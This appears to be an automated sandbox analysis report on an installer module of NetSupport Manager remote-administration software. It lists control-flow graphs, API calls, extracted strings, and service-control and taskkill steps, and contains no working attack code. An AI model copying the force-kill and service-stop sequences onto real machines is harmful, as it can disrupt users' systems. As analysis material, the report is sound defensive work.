                                                                                          control_flow_graph 1003 5df6d0-5df716 GetVersionExW 1004 5df718-5df73d 1003->1004 1005 5df792-5df79c 1003->1005 1007 5df73f-5df741 1004->1007 1008 5df754 1004->1008 1006 5df7a1-5df7b6 LoadLibraryW 1005->1006 1009 5df7b8-5df7c4 GetProcAddress 1006->1009 1010 5df7f3-5df7f9 1006->1010 1011 5df74e 1007->1011 1012 5df743-5df74c 1007->1012 1013 5df757-5df761 1008->1013 1016 5df7ea-5df7f1 FreeLibrary 1009->1016 1017 5df7c6-5df7db GetCurrentProcess 1009->1017 1014 5df868-5df878 call 5e82b3 1010->1014 1015 5df7fb-5df810 GetModuleHandleW GetProcAddress 1010->1015 1011->1008 1012->1011 1012->1013 1013->1006 1018 5df763-5df765 1013->1018 1019 5df85b 1015->1019 1020 5df812-5df826 GetNativeSystemInfo 1015->1020 1016->1010 1017->1016 1034 5df7dd-5df7e7 call 5df030 1017->1034 1022 5df767-5df770 1018->1022 1023 5df772 1018->1023 1027 5df860-5df865 call 5df030 1019->1027 1025 5df839-5df85a call 5df030 call 5e82b3 1020->1025 1026 5df828-5df837 1020->1026 1022->1023 1024 5df778-5df77b 1022->1024 1023->1024 1030 5df77d-5df780 1024->1030 1031 5df78a-5df790 1024->1031 1026->1027 1027->1014 1030->1031 1035 5df782-5df788 1030->1035 1031->1006 1034->1016 1035->1006
                                                                                          APIs
                                                                                          • GetVersionExW.KERNEL32(?,77340900,?,00000000), ref: 005DF6F7
                                                                                          • LoadLibraryW.KERNEL32(kernel32.dll), ref: 005DF7A6
                                                                                          • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 005DF7BE
                                                                                          • GetCurrentProcess.KERNEL32(00642534), ref: 005DF7CB
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 005DF7EB
                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 005DF805
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 005DF80C
                                                                                          • GetNativeSystemInfo.KERNELBASE(?), ref: 005DF819
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryProc$CurrentFreeHandleInfoLoadModuleNativeProcessSystemVersion
                                                                                          • String ID: GetNativeSystemInfo$GetNativeSystemInfo missing$IsWow64Process$cpu is x64, setting wow64=TRUE$cpu type is %d, probably not x64$iswow64process, setting wow64=TRUE$kernel32.dll
                                                                                          • API String ID: 3154316710-1749150432
                                                                                          • Opcode ID: 8fa8a5dce91bd64332c111f53f185bea8da40defb8c0af0ebff38eea0ea454a3
                                                                                          • Instruction ID: 5afb224a41cc21f6f85c31f10db2ffa7059d89de5a9e18219c9b45fe04f466b6
                                                                                          • Opcode Fuzzy Hash: 8fa8a5dce91bd64332c111f53f185bea8da40defb8c0af0ebff38eea0ea454a3
                                                                                          • Instruction Fuzzy Hash: 09412779E006169FC728EF6CACA9AED7AA3FB85701F75507BE40782350D6700981CF51
                                                                                          Function 005DF225 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 140keyboardregistryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1149 5df225-5df22c 1150 5df230-5df245 1149->1150 1150->1150 1151 5df247-5df25a call 5e84df 1150->1151 1154 5df260-5df26e 1151->1154 1155 5df423-5df43e LeaveCriticalSection call 5e82b3 1151->1155 1157 5df270-5df27d 1154->1157 1157->1157 1159 5df27f-5df282 1157->1159 1160 5df43f-5df44b 1159->1160 1161 5df288-5df28e 1159->1161 1162 5df44d 1160->1162 1163 5df452-5df466 call 5e9583 1160->1163 1161->1155 1164 5df294-5df2a0 call 5e9583 1161->1164 1162->1163 1163->1155 1169 5df468-5df499 call 5b34a0 1163->1169 1168 5df2a5-5df2aa 1164->1168 1170 5df335-5df342 GetKeyState 1168->1170 1171 5df2b0-5df2cf call 591f50 call 5919e0 1168->1171 1181 5df4af-5df4b5 1169->1181 1182 5df49b-5df4ac call 5e73d1 1169->1182 1172 5df344-5df34b GetKeyState 1170->1172 1173 5df357-5df365 1170->1173 1191 5df31d-5df322 1171->1191 1192 5df2d1-5df2e9 call 5ea397 1171->1192 1172->1173 1176 5df34d 1172->1176 1177 5df370-5df377 1173->1177 1176->1173 1177->1155 1180 5df37d-5df38e 1177->1180 1185 5df395-5df3cf wsprintfW RegOpenKeyExW 1180->1185 1186 5df390 1180->1186 1188 5df4b7-5df4d9 call 5c9130 1181->1188 1189 5df513-5df532 call 5c9130 1181->1189 1182->1181 1193 5df419-5df41d 1185->1193 1194 5df3d1-5df3f9 RegQueryValueExW 1185->1194 1186->1185 1205 5df4e0-5df4e5 1188->1205 1208 5df535-5df53a 1189->1208 1202 5df32d-5df330 call 5b1dc0 1191->1202 1203 5df324-5df32a call 5e8c09 1191->1203 1211 5df2eb-5df2f2 1192->1211 1212 5df2f4-5df30a call 5eb0ad 1192->1212 1193->1155 1193->1177 1199 5df40c-5df413 RegCloseKey 1194->1199 1200 5df3fb-5df407 call 5e8406 1194->1200 1199->1193 1200->1199 1202->1170 1203->1202 1205->1205 1210 5df4e7-5df510 call 5e762e call 5e79a7 call 5e7376 1205->1210 1208->1208 1214 5df53c-5df552 call 5e762e 1208->1214 1210->1189 1217 5df310-5df31a call 5e8406 1211->1217 1212->1191 1227 5df30c-5df30f 1212->1227 1224 5df554-5df55b OutputDebugStringW 1214->1224 1225 5df561-5df583 LeaveCriticalSection call 5e7376 1214->1225 1217->1191 1224->1225 1233 5df58e-5df5a9 call 5b1dc0 call 5e82b3 1225->1233 1234 5df585-5df58b call 5e8c09 1225->1234 1227->1217 1234->1233
                                                                                          APIs
                                                                                          • GetKeyState.USER32(00000011), ref: 005DF33D
                                                                                          • GetKeyState.USER32(00000010), ref: 005DF346
                                                                                          • wsprintfW.USER32 ref: 005DF3A2
                                                                                          • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00020019,00000000), ref: 005DF3C5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: State$Openwsprintf
                                                                                          • String ID: @$Log$Log=$SOFTWARE\Productive Computer Insight\%s$winst32$winst32.log$winstall
                                                                                          • API String ID: 1774555400-2723375655
                                                                                          • Opcode ID: 7fa90e3ad77cd6266f2e0eb203e0bffa104245743cd68d0af566ca505de00c9e
                                                                                          • Instruction ID: 617b62a6eb61e069b6a787f3ead707d7a08ae65a7ba648c0236bef211aa3a2ba
                                                                                          • Opcode Fuzzy Hash: 7fa90e3ad77cd6266f2e0eb203e0bffa104245743cd68d0af566ca505de00c9e
                                                                                          • Instruction Fuzzy Hash: 3D41157590021A9BCF34DB64DC56BEE7BB5FB44304F54447BE60AA6280EB706A88CF61
                                                                                          Function 005D5490 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 92libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1525 5d5490-5d54d2 LoadLibraryW 1526 5d54d8-5d54eb GetProcAddress 1525->1526 1527 5d55b2-5d55c1 call 5e82b3 1525->1527 1529 5d55b1 1526->1529 1530 5d54f1-5d5501 GetProcAddress 1526->1530 1529->1527 1530->1529 1532 5d5507-5d5543 GetUserNameW 1530->1532 1534 5d5599 1532->1534 1535 5d5545-5d554d 1532->1535 1538 5d559f-5d55a1 1534->1538 1536 5d554f-5d5557 1535->1536 1537 5d55aa-5d55ab FreeLibrary 1535->1537 1536->1538 1539 5d5559 1536->1539 1537->1529 1538->1537 1540 5d55a3 1538->1540 1541 5d5560-5d5562 1539->1541 1540->1537 1542 5d5564-5d557e call 5df030 1541->1542 1543 5d5582-5d5596 call 5b0c30 1541->1543 1542->1541 1548 5d5580 1542->1548 1543->1534 1548->1534
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNELBASE(NETAPI32), ref: 005D54C8
                                                                                          • GetProcAddress.KERNELBASE(00000000,NetUserGetLocalGroups), ref: 005D54E5
                                                                                          • GetProcAddress.KERNELBASE(00000000,NetApiBufferFree), ref: 005D54F7
                                                                                          • GetUserNameW.ADVAPI32(?,00000050), ref: 005D5515
                                                                                          • FreeLibrary.KERNELBASE(00000000), ref: 005D55AB
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryProcwsprintf$FreeLoadLocalNameTimeUserwvsprintf
                                                                                          • String ID: Member of Local Group: %ls$NETAPI32$NetApiBufferFree$NetUserGetLocalGroups$P$e:\nsmsrc\nsm\1410\1410\nt\winst32.c$pTmpBuf != NULL
                                                                                          • API String ID: 3987117131-593064418
                                                                                          • Opcode ID: c7b18d7b67fe78b33895445119e37c5f4dcc0296ee3d3800f28c8052d98c30a3
                                                                                          • Instruction ID: fb2c17783e99d9bdeb70b7dc0339c7314fe7eb1cdbbea6121ca4600057762ec1
                                                                                          • Opcode Fuzzy Hash: c7b18d7b67fe78b33895445119e37c5f4dcc0296ee3d3800f28c8052d98c30a3
                                                                                          • Instruction Fuzzy Hash: D531C671E00739ABCB319B549C45BDEBB7ABF45B00F05419BF50963240E7705E448FA2
                                                                                          Function 005DD5A0 Relevance: 116.0, APIs: 12, Strings: 54, Instructions: 525COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 204 5dd5a0-5dd779 call 5db1f0 call 5e8cd0 call 5df030 call 5d9630 213 5dd780-5dd78f call 5c6e30 204->213 216 5dd79f-5dd7a6 213->216 217 5dd791-5dd79d 213->217 219 5dd7a8-5dd7b4 216->219 220 5dd7b6-5dd7bc 216->220 218 5dd7c2-5dd7c8 217->218 221 5dd7d0-5dd7e7 FindWindowW 218->221 219->218 220->218 222 5dd7ed-5dd815 EnumWindows 221->222 223 5dd937-5dd950 221->223 224 5dd825-5dd84a 222->224 225 5dd817-5dd81e 222->225 223->221 226 5dd956-5dd95d 223->226 227 5dd84c 224->227 228 5dd852-5dd855 224->228 225->224 229 5dd95f-5dd964 Sleep 226->229 230 5dd96a-5dd97d 226->230 227->228 228->223 231 5dd85b 228->231 229->230 230->213 232 5dd983-5dd997 call 5b97d0 230->232 233 5dd8ad-5dd8e6 call 5df030 SendMessageTimeoutW 231->233 234 5dd899-5dd8a3 231->234 235 5dd862-5dd894 call 5df030 PostMessageW 231->235 240 5ddd8d-5dddbb call 5e85a6 call 5e91a1 232->240 241 5dd99d-5dd9d4 GetTickCount 232->241 245 5dd919-5dd92c call 5df030 233->245 246 5dd8e8-5dd90f GetLastError call 5df030 233->246 234->233 235->223 244 5dd9da-5dd9e9 241->244 249 5dda18-5dda49 call 5dd0f0 244->249 250 5dd9eb 244->250 245->223 246->223 259 5dd911-5dd917 246->259 262 5dda4f-5dda51 249->262 263 5ddbe0 249->263 254 5dd9f0-5dda10 call 5ce8e0 call 5e7376 250->254 275 5dda12 254->275 259->223 265 5ddb5e-5ddb8b EnumWindows call 5df030 FindWindowExW 262->265 266 5dda57-5dda6f 262->266 267 5ddbe6-5ddbef 263->267 280 5ddb8d-5ddba4 call 5d50d0 FindWindowExW 265->280 281 5ddba6-5ddbc3 GetLastError call 5df030 265->281 266->267 270 5dda75-5dda85 call 5e84df 266->270 271 5ddc19-5ddc4a call 5dd0f0 267->271 272 5ddbf1-5ddc11 call 5ce8e0 call 5e7376 267->272 283 5dda8a-5dda9a call 5e9116 270->283 284 5dda87 270->284 287 5ddc4c-5ddc56 271->287 288 5ddcba-5ddcc1 271->288 297 5ddc13 272->297 275->249 280->281 302 5ddbc5-5ddbca Sleep 281->302 303 5ddbd0-5ddbda 281->303 304 5dda9c-5ddaac call 5e9116 283->304 305 5ddaf8-5ddafc 283->305 284->283 287->288 295 5ddc58 287->295 293 5ddd3f-5ddd8c call 5cf5a0 call 5e7376 call 5e82b3 288->293 294 5ddcc3-5ddcce 288->294 300 5ddcd0-5ddcdd 294->300 301 5ddc60-5ddc70 call 5d5ef0 295->301 297->271 300->300 307 5ddcdf-5ddcf0 call 5ec0c4 300->307 320 5ddcb2-5ddcb8 301->320 321 5ddc72-5ddc79 301->321 302->303 303->244 303->263 304->305 324 5ddaae-5ddabe call 5e9116 304->324 309 5ddafe-5ddb05 305->309 310 5ddb38-5ddb40 305->310 328 5ddcff-5ddd0c 307->328 329 5ddcf2-5ddcfc call 5d5ef0 307->329 315 5ddb1d-5ddb24 309->315 316 5ddb07-5ddb0f 309->316 310->270 322 5ddb46-5ddb48 310->322 325 5ddb36 315->325 326 5ddb26-5ddb29 315->326 316->310 323 5ddb11-5ddb19 316->323 320->288 320->301 330 5ddc7b-5ddc83 321->330 331 5ddc91-5ddc98 321->331 322->265 332 5ddb4a-5ddb50 322->332 323->323 337 5ddb1b 323->337 324->305 350 5ddac0-5ddad0 call 5e9116 324->350 325->310 326->325 339 5ddb2b-5ddb34 326->339 333 5ddd10-5ddd1d 328->333 329->328 330->320 342 5ddc85-5ddc8d 330->342 335 5ddc9a 331->335 336 5ddcb0 331->336 332->265 334 5ddb52-5ddb58 332->334 333->333 343 5ddd1f-5ddd30 call 5ec0c4 333->343 334->265 334->267 344 5ddca0-5ddca3 335->344 336->320 337->310 339->325 339->326 342->342 347 5ddc8f 342->347 343->293 353 5ddd32-5ddd3c call 5d5ef0 343->353 344->336 349 5ddca5-5ddcae 344->349 347->320 349->336 349->344 356 5ddad6-5ddae6 call 5e9116 350->356 357 5ddad2-5ddad4 350->357 353->293 361 5ddae8-5ddaef 356->361 362 5ddaf1 356->362 357->305 361->305 362->305
                                                                                          APIs
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                            • Part of subcall function 005D9630: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,DE64E134), ref: 005D967A
                                                                                            • Part of subcall function 005D9630: GetLastError.KERNEL32 ref: 005D96BB
                                                                                            • Part of subcall function 005D9630: OpenServiceW.ADVAPI32(00000000,00000000,00000034), ref: 005D96DD
                                                                                            • Part of subcall function 005D9630: GetLastError.KERNEL32 ref: 005D96E5
                                                                                            • Part of subcall function 005D9630: QueryServiceStatus.ADVAPI32(00000000,?), ref: 005D970C
                                                                                          • FindWindowW.USER32(?,?), ref: 005DD7DD
                                                                                          • EnumWindows.USER32(Function_000450A0,00000000), ref: 005DD7FB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLastOpenServicewsprintf$EnumFindLocalManagerQueryStatusTimeWindowWindowswvsprintf
                                                                                          • String ID: $%s %s (%x)...$...Error or timeout, e=%d$...OK$/EC$/ec$8Nb$Back from Install$C:\Windows\Installer\$CICPLUGIN$CICPLUGIN [loggedonuser]$CICWClass$CloseApps32, prod=%d$Closing$Command Line: %s$Created main window %08x$Done:$Exit$Install Failed$NSM$NSMWClass$NSMWControl32$NSSWControl32$NetSupport Manager for Windows (32 bit) V14.10$OK$PCD$PCIAX.DLL$PCIRUNPLUGIN [loggedonuser]$PCIRemoteInstall$PCIVideoPlayer32$Quitting$Quitting %s (%x)...$Restart$Skipping rollback$Start, session=%d, user=%s$TNb$Undoing Install$V14.10$V15.10$boot$display.drv$enum msg wnd$enum msg wnd %x failed, e=%d$imhook.dll$module=%s$nslsp.dll$pNb$pciappctrl.dll$pciapp~1.dll$pcihooks.dll$shellscr.drv$system.ini$ver=%s$winexec.ok
                                                                                          • API String ID: 3914842741-2849156311
                                                                                          • Opcode ID: 851d6adf3ea3f1f7af3823995f71b7fc605cee63d05f004d29c1c02293af8f3b
                                                                                          • Instruction ID: 668e8f4f0b074f1e8014cd8731561b234de1d1e67d186b61fdbfd452c624f249
                                                                                          • Opcode Fuzzy Hash: 851d6adf3ea3f1f7af3823995f71b7fc605cee63d05f004d29c1c02293af8f3b
                                                                                          • Instruction Fuzzy Hash: 4A2236719402699FDB30DF18CC49BAABBB5BB45704F0541EBE849A7341EB709E84CFA1
                                                                                          Function 005D991B Relevance: 79.1, APIs: 24, Strings: 21, Instructions: 305sleepserviceregistryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 363 5d991b 364 5d9920-5d992a 363->364 364->364 365 5d992c-5d997a call 5df030 CreateProcessW 364->365 369 5d997c-5d99b0 WaitForSingleObject CloseHandle * 2 call 5df030 365->369 370 5d99b3-5d99e3 call 593da0 * 2 call 5c6e30 365->370 369->370 380 5d99ea-5d9a50 call 593c80 call 593b70 call 5df030 call 593b70 call 5df030 ControlService 370->380 381 5d99e5 370->381 392 5d9ac5-5d9ade GetLastError call 5df030 Sleep 380->392 393 5d9a52-5d9a67 QueryServiceStatus 380->393 381->380 400 5d9ae4-5d9b24 call 593da0 * 2 392->400 395 5d9a9d-5d9ab4 call 5df030 393->395 396 5d9a69 393->396 395->400 398 5d9a70-5d9a73 396->398 401 5d9a98-5d9a9b 398->401 402 5d9a75-5d9a94 Sleep QueryServiceStatus 398->402 413 5d9b2f-5d9b3f call 5df030 400->413 414 5d9b26-5d9b29 400->414 401->395 406 5d9ab6-5d9ac3 call 5df030 401->406 402->398 405 5d9a96 402->405 405->395 406->400 419 5d9b96-5d9b9d 413->419 420 5d9b41-5d9b52 QueryServiceStatus 413->420 414->413 415 5d9d14-5d9d54 call 5df030 CloseServiceHandle call 5df030 CloseServiceHandle Sleep 414->415 436 5d9d5a-5d9d5c 415->436 437 5d9df4-5d9e1c call 5df030 call 5e82b3 415->437 423 5d9ba3-5d9bbd call 5df030 StartServiceW 419->423 425 5d9cfd-5d9d07 419->425 422 5d9b54-5d9b6a call 5df030 420->422 420->423 422->423 434 5d9b6c 422->434 438 5d9ce7-5d9cfb GetLastError call 5df030 423->438 439 5d9bc3-5d9be5 call 5df030 QueryServiceStatus 423->439 427 5d9d0c-5d9d11 call 5df030 425->427 427->415 442 5d9b70-5d9b73 434->442 436->437 444 5d9d62-5d9d8a call 5df030 GetSystemDirectoryW 436->444 438->415 452 5d9c18-5d9c36 call 5df030 call 5995b0 439->452 453 5d9be7-5d9bea 439->453 442->419 448 5d9b75-5d9b92 Sleep QueryServiceStatus 442->448 456 5d9d90-5d9d9a 444->456 448->442 454 5d9b94 448->454 452->415 472 5d9c3c-5d9c40 452->472 457 5d9bec-5d9c0b Sleep QueryServiceStatus 453->457 458 5d9c0f-5d9c12 453->458 454->423 456->456 460 5d9d9c-5d9dbd 456->460 457->453 461 5d9c0d 457->461 458->452 462 5d9ce0-5d9ce5 458->462 464 5d9dbf-5d9dc2 460->464 465 5d9dd2 460->465 461->452 462->427 467 5d9dcb-5d9dd0 464->467 468 5d9dc4-5d9dc9 464->468 469 5d9dd7-5d9df1 call 5d6700 call 5ecda8 465->469 467->469 468->469 469->437 472->415 474 5d9c46-5d9c57 RegisterEventSourceW 472->474 474->415 476 5d9c5d-5d9c83 GetComputerNameW 474->476 478 5d9c8a-5d9cde wsprintfW ReportEventW DeregisterEventSource 476->478 479 5d9c85 476->479 478->415 479->478
                                                                                          APIs
                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 005D9972
                                                                                          • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,00000000,00000000), ref: 005D9988
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 005D999B
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 005D99A4
                                                                                          • ControlService.ADVAPI32(00000000,00000001,?), ref: 005D9A48
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 005D9A5C
                                                                                          • Sleep.KERNEL32(000001F4), ref: 005D9A7A
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 005D9B49
                                                                                          • Sleep.KERNEL32(000001F4), ref: 005D9B7A
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 005D9B88
                                                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 005D9BB5
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 005D9BDA
                                                                                          • Sleep.KERNEL32(000001F4), ref: 005D9BF1
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 005D9BFF
                                                                                          • RegisterEventSourceW.ADVAPI32(00000000,PCIapp), ref: 005D9C4D
                                                                                          • GetComputerNameW.KERNEL32(?,?), ref: 005D9C75
                                                                                          • wsprintfW.USER32 ref: 005D9C97
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 005D9D22
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 005D9D3C
                                                                                          • Sleep.KERNELBASE(000001F4), ref: 005D9D47
                                                                                          • GetSystemDirectoryW.KERNEL32(?,000000E0), ref: 005D9D7B
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 005D9A88
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$QueryStatus$CloseHandleSleep$wsprintf$ComputerControlCreateDirectoryEventLocalNameObjectProcessRegisterSingleSourceStartSystemTimeWaitwvsprintf
                                                                                          • String ID: AllowStop ret %x$Attempt to start the service$CICWClass$Calling %s$NSMWClass$PCIapp$Restarted client32 service after %s$Service is stopped$Service started ok$Service stopped ok$StartService ok$Use old method$Waiting a while until stopped$\net$\taskkill.exe /F /IM client32.exe /IM runplugin.exe /IM runplugin64.exe$client32 control finished$close service$close service manager$crash$done taskkill$start
                                                                                          • API String ID: 1864760163-1400246591
                                                                                          • Opcode ID: 9346791d8106258d90c5d23b5561e272ba96a0882cb7c3b62001d0488aab1bb2
                                                                                          • Instruction ID: f435e31293ee450e6e08bb32856b6b81ed56eb9d73f0366c4dd6589739626136
                                                                                          • Opcode Fuzzy Hash: 9346791d8106258d90c5d23b5561e272ba96a0882cb7c3b62001d0488aab1bb2
                                                                                          • Instruction Fuzzy Hash: D2B10571A01225ABEB30DB54DC4AFEE7B65BB54704F0440A7F50AA7382DB709B85CF61
                                                                                          Function 005D6E10 Relevance: 51.4, APIs: 1, Strings: 28, Instructions: 606COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,739F1CB0,0000001A,?), ref: 005D6F2C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileModuleName
                                                                                          • String ID: ??F$??I$@~c$AssistantName$AssistantURL$Home$Hyc$Hzc$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$\zc$product.dat$pzc$xzc
